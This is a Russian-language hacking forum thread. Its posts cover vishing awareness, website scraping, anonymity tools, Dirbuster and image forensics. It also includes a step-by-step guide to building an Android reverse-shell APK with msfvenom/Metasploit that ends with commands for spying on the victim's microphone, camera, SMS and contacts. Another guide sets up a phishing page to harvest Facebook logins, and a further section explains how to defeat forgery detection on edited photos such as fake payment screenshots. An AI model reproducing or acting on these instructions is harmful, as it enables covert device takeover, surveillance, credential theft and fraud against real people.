"Всю свою жизнь я слышал от окружающих, что я делаю что-то не так. Это плохо, это невозможно, это недопустимо, этого не поймут. Я никогда не представлял это, но все повернулось так, что быть тем, кто ты есть на самом деле - это недопустимая роскошь, и большинству людей запрещено делать то, что они хотят, и быть тем, кем они хотят. Пытаясь пойти против системы, никогда не знаешь, где окажешься. Ты должен быть осторожен со своими желаниями, и в то же время не отказываться от мечты и надежды, хранить их в надежном месте, в своем сердце и душе".Третья же работа "Адский вызов" пронизана верой на светлое будущее.
"После всего этого унижения, через кровь, пот и слезы за российской решеткой, несмотря ни на что, я верю, что я почти победил в этом ужасающем раунде. В то же время я считаю, что это было послание от Вселенной, которое я принял достойно. Теперь мой черед бросать кости, бросить вызов - я обращаюсь к дикой Метавселенной, со всей ее неограниченностью и разнообразием: пусть игра начнется".
Вам возможно будет это интересно:
NFT - феномен в мире криптовалют
Бум цифрового искусства NFT
https://telegra.ph/Kak-NFT-izmenili-...dozhnika-02-26interested
BlackMAST
25.09.2023, 10:53
Вишинг: Что это такое и как защититься
https://i.gyazo.com/5e36fec4649f2355e00114d4417762a6.jpg
Вступить в наш чат
По мере развития технологий совершенствуется и тактика киберпреступников, стремящихся завладеть личной и финансовой информацией пользователей. Одним из таких способов мошенничества, получивший известность в последние годы, является вишинг. В этой статье мы подробно изучим мир вишинга, поймем, как он работает, и вооружимся знаниями, которые помогут предотвратить такое мошенничество и защитить вашу личную информацию.
https://i.gyazo.com/ea05e6b03615a1a690f7a95b2cfad6f0.jpgОткрыва я мир вишинга
Вишинг (англ. Vishing, сокращение от “voice phishing,”), что в переводе означает «голосовой фишинг», — это тип атаки с использованием социальной инженерии, при которой злоумышленники выдают себя за доверенные организации или отдельных лиц посредством телефонных звонков или сообщений голосовой почты. Конечная цель — получить личную, финансовую и конфиденциальную информацию от своих жертв.
Мошенники каждый раз действуют по определенной схеме:рассылают сообщения с вредоносными ссылками, после перехода по которым, отображается синий экран с предупреждающим сообщением и бесплатным номером телефона, по которому следует позвонить для устранения возникшей проблемы с компьютером.
По указанному номеру телефона отвечает технический специалист, готовый оказать любую помощь пользователю, после того как последний предоставит «специалисту» информацию о своей кредитной карте для оплаты программного обеспечения. После передачи потерпевшим данной информации, мошеннические действия завершаются, программное обеспечение не работает, технический специалист не отвечает, а денежные средства с банковской карты пропадают.
Распознать потенциальное мошенничество можно по определенным предупреждающим знакам:
Доверенные лица. Зачастую мошенники представляются экспертами или специалистами в каких-либо областях. При этом, они могут называться компьютерными специалистами, банкирами, полицейскими и т.д. Целью этого подражания является создание у жертв ложного чувства безопасности.
Срочность и страх. Мошенники манипулируют жертвами, вызывая у них чувство неотложности или страха. Например, они могут заявить, что ваш банковский счет заблокирован и необходимо немедленно снять блокировку. Эта срочность вынуждает людей поспешно раскрывать конфиденциальную информацию.
Инструменты для поиска жертвы
В схемах вишинга злоумышленники используют генераторы мобильных номеров и скрипты для проверки их валидности (чекеры). Как понятно из названия, генератор создает подборку номеров, а чекеры проверяют, активны ли они.
https://i.gyazo.com/cc79322c2ed05589c37be1369476086d.jpg
https://i.gyazo.com/6a8c5324dacd7af0c17756bb577dc601.jpgНа этих скриншотах вы можете увидеть, как происходит проверка сгенерированных ранее мобильных номеров. Кроме, их валидации, указывается регион и провайдер связи. В итоге злоумышленник получает список номеров для распространения мошеннических сообщений. Такие же инструменты используются, например, для сбора контактов из мессенджеров.
Некоторые инструменты открыто можно найти в легальных магазинах приложений, по типу Chrome Store и Google Play.
https://i.gyazo.com/5c1ab301b363629ee4913b8052aad04f.jpgСуществ ует множество магазинов, где мошенник может купить базы данных потенциальных жертв (обычно это email или мобильные номера, а также может быть фамилия и имя человека, регион проживания). Данные магазины могут использоваться для покупки, например, базы мобильных номеров для спама и телефонного мошенничества. Также там можно приобрести аккаунты соцсетей и мессенджеров для последующего совершения мошеннической атаки.
https://i.gyazo.com/58242b5f86516dd6d5e97fbc3f260c50.jpgКак защититься от вишинга
1. Проверьте личность вызывающего абонента
Никогда не доверяйте слепо информации абонента, даже если она, как вам кажется, получена из надежного источника. Если во время телефонного звонка вам поступил запрос о вашей личной информации, немедленно повесьте трубку. Затем самостоятельно проверьте личность звонящего по официальным каналам.
2. Берегите свою личную информацию
Ни при каких обстоятельствах вы не должны сообщать личную или финансовую информацию по телефону, особенно если звонок был инициирован не вами. Законные организации никогда не будут запрашивать по телефону конфиденциальные данные, такие как номера социального страхования, пароли учетных записей или данные кредитной карты.
3. Не идите на поводу у манипулятора
Вишинг-мошенники полагаются на тактику эмоционального давления, чтобы подтолкнуть вас к принятию импульсивных решений. Всегда оставайтесь при совсем мнении. Прервите разговор, дайте себе время на обдумывание услышанного.
4. Используйте защиту от спам-звонков
Все современные мобильные телефоны оснащены функцией проверки вызовов, которая может помочь выявить и заблокировать все нежелательные звонки.
Заключение
Вишинг представляет собой серьезную угрозу в наш цифровой век. Однако, понимая механику телефонного мошенничества, и следуя подробным советам, представленным в этой статье, вы сможете значительно обезопасить себя. Помните, что ваша личная информация бесценна, и ее защита имеет первостепенное значение. Следите за нашими статьями, чтобы оставаться в курсе, так как осведомленность и осторожность помогут вам оставаться на шаг впереди мошенников и не стать их жертвой.
BlackMAST
28.09.2023, 18:06
Взлом Android с помощью Metasploit и Msfvenom
https://i.gyazo.com/b3e5e03f13b57f2b928e24554a1d59cb.jpg
Вступить в наш чат
Вы, наверное, ни раз слышали о самом известном хакерском инструменте под названием Metasploit. Все профессиональные хакеры в один голос скажут, что Metasploit — универсальный инструмент, который имеет множество модулей для взлома Android, IOS, а также Windows. А его работа с Msfvenom считается лучшей комбинацией для взлома устройств Android, что мы сегодня и проверим.
https://i.gyazo.com/9a20e85a77c51cb01f2056a3f1bf195f.jpgMetaspoilt и Msfvenom
Так почему же все так любят Metasploit? Metasploit, созданный Rapid7, имеет самую большую базу эксплойтов, шеллкодов и много разнообразной документации. А самое приятное, что все это абсолютно бесплатно. В народе его даже успели прозвать “хакерским швейцарским ножом”.
Msfvenom — бесплатный инструмент для создания полезной нагрузки (вредоносного файла). Это, так сказать, «брат» Metasploit. Стоит отметить, что теперь этот инструмент есть и в Kali Linux как отдельная опция, позволяющая максимально упростить работу.
Когда дело доходит до взлома телефонов Android, существует множество способов сделать это. Есть приложения, сайты, скрипты и многое другое. Мы уже ни раз демонстрировали вам различные методы взломов, ну а сегодня мы расскажем, как взломать телефон Android с помощью Metasploit и Msfvenom.
Как взломать Android
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Для выполнения этого взлома с использованием Metasploit и Msfvenom вам понадобится ОС Kali Linux.
Итак, приступим к взлому.
Шаг 1. Создание вредоносного APK-файла
Откройте терминал Kali Linux и введите следующую команду:
https://i.gyazo.com/0c87f5a5be3301c338297d495713d77a.jpg# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.78.129 LPORT=4444 R > hacking.apk*LHOST= Ваш IP-адрес
*LPORT= 4444
*Используйте ifconfig, чтобы найти свой IP-адрес, если вы его не знаете.
# ifconfig
Шаг 2. Отправка APK-файла жертве
Вы создали вредоносный .apk-файл шпионского приложения с помощью Metasploit и Msfvenom. По умолчанию он будет сохранен в вашей папке /home/. Найдите свой недавно созданный файл hacking.apk и отправьте его жертве. Используйте навыки социальной инженерии, чтобы заставить жертву установить файл.
*Если у вас возникли какие-либо ошибки или проблемы с подписью, используйте следующее:
Keytool(предустановлен в Kali Linux)
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Jarsigner (предустановлен в Kali Linux)
Затем введите:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hacking.apk aliasname
После этого:
jarsigner -verify -verbose -certs hacking.apk
Шаг 3. Настройка Metasploit
Откройте новый терминал и используйте следующую команду, чтобы запустить платформу Metasploit.
https://i.gyazo.com/75240edd71ff872fd844f80f64e0cd70.jpg
# msfconsole
Теперь в консоли платформы Metasploit введите следующее:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
после этого настройте адрес прослушивающего хоста:
set LHOST 192.168.78.129
set LPORT 4444
exploit
*LHOST= Ваш IP-адрес
*LPORT= 4444
Шаг 4. Эксплуатация
Теперь, когда жертва откроет приложение на своем телефоне, вы получите полный доступ к устройству.
Вот некоторые команды, которые вы можете использовать:
record_mic — записывает звук с устройства Android и сохраняет его на локальном диске.
webcam_snap — позволяет делать снимки, взломав камеру Android устройства.
webcam_stream — транслирует онлайн видео со взломанной камеры Android.
dump_contacts — копирует все контакты с телефона жертвы.
dump_sms — взламывает сообщения жертвы и сохраняет их в текстовом файле в вашей системе.
geolocate — отслеживает взломанное устройство по местоположению.
Заключение
Хотя Metasploit и Msfvenom не так сложны в использовании, они требуют последовательных шагов, которые необходимо реализовать. Но благодаря нашему руководству любой начинающий хакер с лёгкостью осилит эти инструменты. Надеемся, что эта статья была для вас информативной и полезной. Удачи!
BlackMAST
19.10.2023, 18:03
HTTrack: Руководство по парсингу сайта
https://i.gyazo.com/5b762c6983464a3cf84ddc39021e4f32.jpg
Вступить в наш чатВ интернете часто необходимо собрать большой объем информации с сайта, после чего её проанализировать и применить для каких-либо целей. Однако, делать это вручную — очень трудоемкий и энергоресурсный процесс. Откройте для себя HTTrack, автоматизированный инструмент для парсинга сайтов с открытым исходным кодом, который может собирать данные за считанные минуты. В этой статье мы рассмотрим инструмент HTTrack в мельчайших деталях, а также предоставим пошаговую инструкцию к использованию.
https://i.gyazo.com/a12c992ef18666bc52fe7096962ebab0.jpgЧто такое парсинг сайта
Парсинг – это автоматизированный сбор информации с любого сайта, ее анализ, преобразование и выдача в структурированном виде, чаще всего в виде таблицы с набором данных.
Парсер сайта — это любая программа или сервис, которая осуществляет автоматический сбор информации с заданного ресурса.
Законно ли парсить чужие сайты
Парсинг данных с сайтов не противоречит закону, если:
получаемая информация находится в открытом доступе и не несет коммерческую тайну;
не затрагиваются авторские права полученной информации;
парсинг проводится законным методом;
парсинг не влияет на нормальную работу сайта (не приводит к сбоям).
Что такое HTTrack и его возможности
HTTrack — бесплатный инструмент с открытым исходным кодом, разработанный Xavier Roche. Он может копировать целые сайты, включая файлы HTML, изображения, CSS, JavaScript и многое другое. Основная функция HTTrack — создание локального зеркала сайта, позволяющего просматривать его в автономном режиме.
HTTrack может фильтровать контент, позволяя загружать только определенные файлы, такие как изображения, видео или документы.
Важно отметить, что HTTrack сохраняет исходную структуру папок зеркального сайта. С их помощью вы сможете легко ориентироваться.
HTTrack может приостанавливать и возобновлять загрузку без потери прогресса.
Кроме того, вы можете легко обновлять свою локальную копию с помощью функции «Обновление». Инструмент добавит недостающий контент на ваш зеркальный сайт.
HTTrack отличается скоростью и эффективностью, так как использует многопоточную систему для быстрой загрузки.
HTTrack ведет подробные журналы процесса, что упрощает мониторинг и устранение любых возникающих проблем.
Как использовать HTTrack: пошаговое руководство
Давайте углубимся в практические аспекты использования HTTrack.
1. Загрузите и установите HTTrack с официального сайта HTTrack по ссылке. Скачайте версию HTTrack, соответствующую вашей операционной системе (Windows, Linux, macOS). Установите программу, следуя инструкциям на экране.
2. Запустите HTTrack. После установки запустите HTTrack.
3. Настройте свой проект. Нажмите «Далее», чтобы начать создание нового проекта. Введите имя своего проекта и выберите папку назначения, в которой будет храниться зеркальный сайт. Нажмите "Далее."
https://i.gyazo.com/b20b48409f51ba8e239ce707aab1c3ec.jpg4. Установите параметры. Настройте параметры парсинга, указав начальный URL-адрес (сайт, который вы хотите парсить). Установите фильтры для всех типов файлов (например, скачать только изображения). Нажмите «Далее», чтобы продолжить.
https://i.gyazo.com/c513869d885f6141a0990582a18cca89.jpg5. Запустите парсинг. Нажмите «Готово», чтобы начать Парсинг сайта. Вы можете отслеживать ход выполнения и проверять журналы на наличие ошибок.
https://i.gyazo.com/e61b5dbd4f6e187e9d4bd696a7a6371e.jpgПосле завершения парсинга перейдите в папку назначения, указанную вами ранее. Откройте файл «index.html», чтобы начать изучение зеркального сайта.
Заключение
HTTrack — это универсальный инструмент для парсинга сайтов, который делает процесс простым и эффективным. Удобный интерфейс, настраиваемые функции и открытый исходный код делают его незаменимым помощником в вашем арсенале инструментов. Начните свое изучение парсинга сайтов уже сегодня с помощью HTTrack. Удачного пользования!
BlackMAST
23.10.2023, 15:02
Как сохранить анонимность в интернете
https://i.gyazo.com/20d83a1d7f6c2d098306d275e14b95f0.jpg
Вступить в наш чатКакие следы в интернете вы оставляете, а главное, что можно по ним узнать? Гораздо больше, чем вы думаете. Любая собранная информация может быть использована для идентификации вашей личности. Чтобы этого избежать, мы подготовили для вас два инструмента, которые помогут замести следы, обеспечив безопасность в сети.
https://i.gyazo.com/89c5638012a4320c098c497f52d022bd.jpgИнструм енты для анонимности в сети
Anonsurf — это инструмент для изменения IP-адреса в Kali Linux, разработанный командой Parrot Sec. Он работает в фоновом режиме, постоянно меняя ваш IP-адрес, чтобы вы оставались анонимными. Anonsurf использует два основных сервиса для обеспечения анонимности в Интернете. Один из них — Tor, а другой — iptables, служба Linux для управления IP-адресами. Он имеет открытый репозиторий на Github.
Macchanger — это встроенный инструмент Kali Linux, который может изменить ваш Mac-адрес. Он имеет множество функций для сохранения вашей анонимности.
Итак, приступим к установке и настройке Anonsurf и Macchanger в Kali Linux.
Как изменение IP и Mac-адреса делают вас анонимными
Ваш IP и MAC-адреса — это уникальные идентификаторы, по которым можно вас найти. Ваши системные данные, а также местоположение можно отслеживать с помощью ваших адресов. Таким образом, когда вы измените свой Mac и IP-адреса, вас не получится деанонимизировать.
Установка Anonsurf
Шаг 1. Откройте терминал в Kali Linux и используйте следующую команду, клонирующую репозиторий Anonsurf из Github:
git clone https://github.com/Und3rf10w/kali-anonsurf.git
https://i.gyazo.com/b33cac496e097b7ef409fa077521df01.jpg
Шаг 2. Измените каталог и дайте разрешения anonsurf. Вы можете сделать это с помощью следующих команд:
cd kali anonsurf
****d +x ./installer.sh
Шаг 3. Запустите сценарий anonsurf:
sudo ./installer.sh
https://i.gyazo.com/b4bb78f57d755ed79d2ff382b4d4fe54.jpg
Шаг 4. Теперь начнется установка и будут установлены зависимости.
Шаг 5. После завершения установки введите команду help, чтобы получить список всех возможных опций инструмента:
anonsurf help
https://i.gyazo.com/aecd1133d066e37b5b6fd172e591ce80.jpg
Шаг 6. Теперь запустите службу Anonsurf:
anonsurf start
Поздравляем, ваш IP-адрес скрыт. Теперь изменим MAC-адрес вашей системы.
https://i.gyazo.com/eff550c3427f4ddb43e2bb2a8f83a502.jpg
Установка Macchanger
Шаг 1. Выключите сетевую карту. Используйте следующую команду Linux, чтобы отключить сетевую карту:
ifconfig device down
Используйте команду ifconfig, чтобы найти имя вашего устройства.
Это будет либо eth0,eth1 или wlan0, wlan1 и т. д.
Шаг 2. Установите случайный MAC-адрес:
macchanger -r eth0
https://i.gyazo.com/bc5d2cf59cd16e765480e6570c896a3f.jpg
Как видно на изображении выше, Mac-адрес был изменен.
Чтобы проверить все команды, используйте опцию справки:
macchanger -h
Примечание: Постоянный MAC-адрес будет восстановлен после перезагрузки.
https://i.gyazo.com/b98070b80cde13ed28f0c90b84fd6956.jpg
Шаг 3. Включите сетевую карту:
ifconfig eth0 up
Шаг 4. Восстановите Mac-адрес по умолчанию. Если вы хотите восстановить ваш MAC-адрес, используйте следующие команды:
macchanger –p eth0
Шаг 5. Подмена Mac-адреса.
https://i.gyazo.com/1224672c92cb50dfd1ee9a68d0d0357d.jpg
Вы можете подделать MAC-адрес, используя следующую команду:
macchanger -m [Spoofing MAC Address] eth0
macchanger -m XX:XX:XX:XX:XX:XX eth0
Здесь XX:XX:XX:XX:XX:XX следует заменить на целевой MAC-адрес.
Если вы получили следующую ошибку:
ОШИБКА: Невозможно изменить MAC: интерфейс включен или нет разрешения: невозможно назначить запрошенный адрес.
То вам нужно отключить сетевой интерфейс, а затем изменить MAC-адрес, введя команду:
ifconfig wlan1 down
Теперь вы полностью анонимны, поскольку ваш IP и MAC адреса скрыты.
BlackMAST
26.10.2023, 12:31
Dirbuster: ваш ангел-хранитель в мире кибербезопасности
https://i.gyazo.com/8573de0561a02286f9a962969c41ad3e.jpg
Вступить в наш чатВ бесконечном противостоянии с киберугрозами инструмент под названием Dirbuster выступает грозным оружием. В этой статье мы окунемся в мир Dirbuster, раскрыв все его секреты и потенциал для защиты вашего цифрового мира.
https://i.gyazo.com/169a0e3df4546522b1d017c5a4cab0fd.jpg
Скрытые угрозы
Прежде чем мы раскроем возможности Dirbuster, давайте признаем зловещую реальность цифрового мира. Каждый день хакеры и злоумышленники рыскают в поисках уязвимостей, подобно призрачным хищникам, которые скрываются в темных уголках киберпространства, затаившись в ожидании идеального момента для удара.
Каждый пользователь обязан сохранять бдительность, чтобы не стать жертвовать злоумышленников. Одним из фундаментальных принципов кибербезопасности является обеспечение защиты ваших данных от взломов. Именно здесь в игру вступает Dirbuster.
Dirbuster: на страже вашего сайта
Этот мощный инструмент предназначен для проведения разведки сайтов, помогая обнаружить скрытые каталоги и файлы. Интрумент неустанно сканирует ваш веб-сервер, выявляя потенциальные уязвимости до того, как злоумышленники смогут ими воспользоваться.
Dirbuster работает по простому, но эффективному принципу – перебор каталогов и файлов. Он отправляет на целевой веб-сервер шквал запросов, пробуя разные имена каталогов и файлов. Когда он находит совпадение, он предупреждает вас о наличии уязвимостей.
Принцип работы Dirbuster
Начать работу с Dirbuster очень просто. Во-первых, он имеет открытый исходный код, а во-вторых, совместим с различными платформами. Следовательно, вы можете быстро загрузить его и начать сканирование своего сайта в течение нескольких минут.
Одной из сильных сторон Dirbuster является его универсальность. Он позволяет вам настраивать списки слов и расширения, которые вы хотите использовать во время сканирования. Это означает, что вы можете адаптировать сканирование Dirbuster к вашим конкретным потребностям.
Установка Dirbuster
Давайте перейдём к процессу установки. Dirbuster — это инструмент на основе Java, поэтому вам необходимо иметь в вашей системе Java (JRE).
Шаг 1. Установите Java
Если у вас не установлена Java, вы можете загрузить ее с официального сайта Oracle или использовать OpenJDK, популярную альтернативу с открытым исходным кодом.
Шаг 2. Загрузите Dirbuster
Вы можете загрузить инструмент с официального сайта. Убедитесь, что вы скачиваете последнюю версию, обычно предоставляемую в виде файла JAR (архив Java).
Шаг 3. Запустите Dirbuster
После загрузки JAR-файла Dirbuster вы можете запустить его с помощью следующей команды в своем терминале:
java -jar DirBuster-0.12.jar
Замените DirBuster-0.12.jar настоящим именем загруженного вами JAR-файла Dirbuster.
Использование Dirbuster: пошаговое руководство
Теперь, когда у вас есть этот инструмент, давайте посмотрим, как вы можете его использовать.
https://i.gyazo.com/5d14353a8a1f3dbadd4ab0c66c4dd896.jpg
Шаг 1. Укажите целевой URL-адрес
Чтобы начать сканирование, вам необходимо указать целевой URL-адрес. После -u напишите URL-адрес:
java -jar DirBuster-0.12.jar -u http://пример.com
Шаг 2. Выберите список слов
Выберите список слов для сканирования, используя -l, за которым следует путь к файлу списка слов. Dirbuster предоставляет список слов по умолчанию, но вы также можете создавать собственные словари для настройки сканирования:
java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt
Шаг 3. Запустите сканирование
Чтобы начать сканирование, добавьте -r. Это говорит о том, что инструмент будет исследовать каталоги и файлы:
java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt -r
https://i.gyazo.com/643cd99207352ca01da4404c1f11f95a.jpg
Дополнительные команды
Dirbuster предлагает несколько дополнительных команд для улучшения сканирования:
1. Сканирование методом перебора: добавьте -b для сканирования методом перебора:
java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt -r -b
2. Выбор протокола: чтобы указать протокол, отличный от HTTP, используйте -p:
java -jar DirBuster-0.12.jar -u ftp://пример.com -l /path/to/словарь.txt -r
https://i.gyazo.com/0c948d8fa85d77ca847094a42ca0bc10.jpg
3. Сортировка расширений: для сортировки по расширениям используйте -x:
java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt -r -x php,html
Заключение
Dirbuster помогает выявлять и устранять уязвимости до того, как злоумышленники смогут ими воспользоваться. Заблаговременно обнаруживая скрытые каталоги и файлы, он укрепляет защиту вашей цифровой крепости и позволяет оставаться на шаг впереди потенциальных угроз. Не ждите, пока станет слишком поздно. Загрузите Dirbuster уже сейчас, чтобы начать сканирование своего сайта.
BlackMAST написал(а):
https://i.gyazo.com/853e1432d5ea1ddb1bd2d7e171ba3c08.jpg
Не верь своим глазам. Как определить и скрыть фотошоп
Вступить в наш чат
Фотография редко предстает перед нами в исходном виде. Зачастую то, что вы видите - это результат долгого и качественного монтажа. Пускают пыль в глаза не только девушки из инстаграма, но так же и многие сервисы. Практически всегда любые услуги сопровождаются картинками, скриншотами. И у вас могут возникнуть сомнения в честности продавца и в предоставляемой им услуге. Нельзя со 100% гарантией сказать, подвергалась ли фотография обработке или нет, но как и везде существует человеческий фактор - неопытность отрисовщика и ваши знания в этом деле. Данная статья поможет вам разобраться в видах монтажа и как его разоблачить.
https://i.gyazo.com/2d2417e241230d451522973cd911d4cc.jpg
Нет единого алгоритма, который определил бы фотошоп. Нельзя загрузить фото в программу и быть уверенным, что она сможет определить монтаж по шумам или, что еще лучше, по отсутствию метаданных. Все методы должны использоваться в совокупности. Существует даже целое подразделение в криминалистике, которое получило название Image Forensics или "криминалистика изображений", в его основе лежит задача определить подлинность фотографии и наличие изменений.
Разберем основные алгоритмы Image Forensics:
Внимательный осмотр
Ваши глаза - основной инструмент. Достаточно загрузить фотографию в любой редактор, увеличить зум на максимум, и все недочеты предстанут перед вами.
Как, например, на этой фотографии. Вы хорошо можете заметить склейки и разрывы полосок, чего никак не должно быть.
https://i.gyazo.com/50288fe527b25d83ea3bc9a9507c065f.jpg
Ко всему прочему, монтаж может быть настолько дилетантским, что, загрузив фото в ExifTool, вы увидите такую картину:
https://i.gyazo.com/7aaa777d3a4b25647ae8c761a27ecd08.jpg
Иногда не нужна никакая программа, чтобы сказать, что фото побывало в фотошопе.
https://i.gyazo.com/4fc27c602307c4816ba7b09c81e1adfb.jpg
Также загружаем фото в поиск по картинкам и находим оригинал:
https://i.gyazo.com/dc983ce59d3e6e0091295dc48993b0fa.jpg
Если гугл поиск не дал результатов, есть еще один способ найти первоисточник фотографии:
В этом поможет сайт TinEye - поиск по изображениям и платформам, где эти фото хостятся. Найдет фотографии, даже если над ними была проделана определенная работа в фотошопе.
Добавьте фотографию и нажмите на "Oldest", так вы увидите первоисточник.
Если отрисовщик оказался не из новичков, то потребуются более серьезные меры. Все нижеописанные методы базируются на программеForensically.
Error Level Analysis или ELA
При сохранении фотография каждый раз сжимается, меняется количество пикселей, конвертируются цвета - так устроен формат JPEG. И даже если вы загружаете фотографии в высоком разрешении, разница в качестве все равно будет присутствовать.
При обычном осмотре фото, недочеты не так уж просто заметить, скорее даже невозможно. Тут на помощь приходит ELA - анализ фотографии на наличие наложений, различий в качестве и несоответствий в цветовой гамме. После редактирования уровень детализации значительно теряется, и любая область, темнее или светлее других, говорит о том, что фотошоп присутствовал. Работает ELA просто: обработанная область должна иметь различие в цвете.
Возьмем для примера фото из интернета. Мошенники часто делают фейковые скрины переводов, и сейчас мы будем разоблачать один из таких.
https://i.gyazo.com/d4c4b05f0209ec930860d08c68dd6640.jpg
На первый взгляд ничего необычного. Теперь загрузим фото в Forensically и выберем "Error Level Analysis".
https://i.gyazo.com/e551d16bc85ccbae64e5a6e409f370d8.jpg
Обратите внимание на появившиеся вклейки, которые отображаются другим цветом. Можно с 99 % уверенностью сказать, что фотография подвергалась монтажу.
ELA не всегда работает верно. Если мы возьмем любую фотографию с контрастным фоном, то анализ покажет тот же самый результат.
https://i.gyazo.com/4a78f6b628fd14d171b4086a55e80273.jpg
Именно поэтому нельзя полностью доверять этому методу. Для работы с ELA выбирайте фото с однотонными областями и без резких переходов. И всегда перепроверяйте с помощью других методов.
Noise Level Analysis
Исходное изображение и наложенная картинка или текст имеют различия в шумах. Так, Noise Level Analysis ищет шум и деформацию, появившиеся после редактирования.
Снова проверим на нашей картинке:
https://i.gyazo.com/dbbcaa84f8475972023df3f17750a879.jpg
Что наблюдаем? А видим мы увеличение шума в той же области, чего быть не должно.
Luminance Gradient Analysis
Покажет наличие фотошопа, ретуши, хромакея.
Работает данный способ со светом, который присутствует на любой фотографии. Как в жизни, так и на фото на объект всегда направлен источник света: чем ближе он к источнику, тем освещенность выше, дальше - ниже.
Рассмотрим на примере двух фотографий: НЛО и самолет в небе.
https://i.gyazo.com/2ca047d6d09abb1244b84c2cc64ce697.jpg
После анализа фотографии на градиент освещенности, было замечено, что свет падает неестественно, переход между тенями и светлыми участками слишком резкий. Чтобы окончательно убедиться в нереальности НЛО ( ̶я̶ ̶х̶о̶ч̶у̶ ̶в̶е̶р̶и̶т̶ь̶), мы добавим фотографию на проверку шумов. Вся тарелка светится как солнце в ясный день, что окончательно подтверждает нашу теорию.
Для сравнения возьмем другое фото:
https://i.gyazo.com/a329ab3b10efc78b6d84df7872fa17e2.jpg
Сравните как равномерно падает свет на самолет, никаких резких переходов - вверху область с наибольшей освещенностью, внизу с наименьшей - это говорит о рассеянном свете.
Данный метод определения монтажа один из самых выигрышных, он работает практически на любой фотографии, и любителям фотошопа не всегда удается его обхитрить.
Principal Component Analysis или PCA
Простым языком суть этого метода заключается в том, что если объекты находятся не на своих местах, то они будут отображаться на PCA в виде ярких пикселей, несоответствий цветов. Это будет значить, что на фото присутствует локальный монтаж (Healing Brush) или вклейка (Clone Stamp), или все вместе как на нашем примере:
https://i.gyazo.com/97fa6c9cb097b0a577e8867a9535b708.jpg
На фоне тарелки и на самом небе есть очень заметные пиксели. Скорее всего помимо полной вклейки проводилась и другая работа над картинкой, возможно, точечно удалялись птицы. Стоит отметить, что подобные крупные пиксели не всегда бывают на фото, чаще всего требуется увеличивать зум в различных областях и долго всматриваться, чтобы найти "обман".
Как обхитрить
Error Level Analysis
Не хочешь, чтобы переходы и различия в цвете выдали твой потрясающий монтаж? Пересохрани фотографию 10 раз, и ELA не покажет ничего примечательного.
Если не охота заморачиваться с сохранением, то можно изменить размер на любой коэффициент не кратный 2. Например, уменьшаем фото на 7% - ELA становится бесполезным.
Используйте формат PNG на двух фотографиях, ELA работает только c JPEG.
Noise Level Analysis
Как скрыть появившийся шум на фото? Добавить своего шума, так чтобы нельзя было понять, где какой шум начинается.
Если для обмана ELA мы меняли размер, то здесь нужно изменить качество раза так в 2.
Principal Component Analysis
Замыльте место редактирования, так цвета и переходы станут более плавными и анализ фото по PCA не даст результатов.
В случае как и с ELA, поможет изменение размера.
Итог:
Из-за растущей популярности ко всевозможным редакторам возникает некий ряд проблем, который может поставить под сомнение честность и добросовестность человека, использующего фотошоп. Дабы не дать себя обмануть, и самому не попасться на неумелом монтаже, мы разобрались как работают инструменты и как их можно обходить.
Image Forensics не совершенен. Он хорошо действует в том случае, когда человек не пытался утаить свою обработку. Если же монтажер знает о способах сокрытия своего обмана, то тут криминалистика изображений мало чем может помочь. Тем не менее, даже самый умелый пользователь фотошопа может совершить ошибку, что уж тут сказать про обычного человека.
https://telegra.ph/Ne-ver-svoim-glaz...-na-foto-01-28
P
написать полезное текстовое сообщение на 4-5 предложений на тему Авторские статьи по заработку, мануалы и скрипты по безопасности
Добро пожаловать! Если вы интересуетесь заработком и безопасностью, то я могу порекомендовать вам обратиться к авторским статьям, мануалам и скриптам, которые связаны с этими темами. В авторских статьях по заработку вы можете найти полезные советы и стратегии для увеличения дохода, а также информацию об основных трендах и возможностях в сфере онлайн-бизнеса. Мануалы по безопасности, в свою очередь, предлагают подробные инструкции по защите ваших данных, предотвращению кибератак и обеспечению конфиденциальности в онлайн-среде. Наконец, скрипты по безопасности помогут автоматизировать процессы обнаружения и реагирования на потенциальные угрозы, что повысит уровень безопасности ваших систем и данных. Не забывайте изучать источники с проверенной репутацией, чтобы получить максимальную пользу от такой информации. Удачи в ваших исследованиях!
BlackMAST
20.11.2023, 13:50
Как создать фишинговую страницу для взлома Facebook
https://i.gyazo.com/3d3f5255013cad14868581d265d78948.jpg
Вступить в наш чатХотите узнать, как хакеры создают фишинговую страницу для взлома? Мы покажем вам два метода: один — простой для новичков, которые хотят просто протестировать взлом, а второй — для тех, кто хочет научиться взлому и пентесту, а также создать свою собственную фишинговую страницу Facebook.
https://i.gyazo.com/18b00f473b6894329563a8103600cf63.jpg
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Простой способ взлома
Загрузите файлы взлома: для мобильных телефонов и для компьютеров (лучше отдать предпочтение ПК)
Бесплатный хостинг: 000webhost. При желании вы можете использовать любой хостинг, но в этой статье мы будем использовать именно этот.
Как создать фишинговую страницу Facebook
Шаг 1. Перейдите на сайт 000webhost и нажмите «Зарегистрироваться», используя любой адрес электронной почты (это БЕСПЛАТНО). Очень важно подтвердить свой адрес электронной почты, чтобы ваша учетная запись была активной.
https://i.gyazo.com/7db0b26b3fa45baac23469d582f8667a.jpg
Шаг 2. В конце регистрации установите пароль и выберите название сайта, подходящее для вашей фишинговой страницы.
Шаг 3. После проверки вашего адреса электронной почты выберите «Диспетчер файлов», а затем нажмите «Загрузить файлы сейчас».
Шаг 4. Теперь вы будете перенаправлены на файловый менеджер вашего сайта, как показано ниже:
https://i.gyazo.com/661a616c399212b1b18c2d2dc1a19f0d.jpg
Шаг 5. Откройте папку public_html. Загрузите оба файла index.html и post.php, нажав значок загрузки в правом углу файлового менеджера.
Шаг 6. Перейдите к списку сайтов на панели и скопируйте адрес ссылки на свой сайт, который вы ранее создали. «Домен, который был создан хостингом».
Шаг 7. Как только целевой пользователь войдет на сайт, вы увидите в файловом менеджере следующий файл с именем username.txt. Откройте его, чтобы увидеть логин и пароль учетной записи.
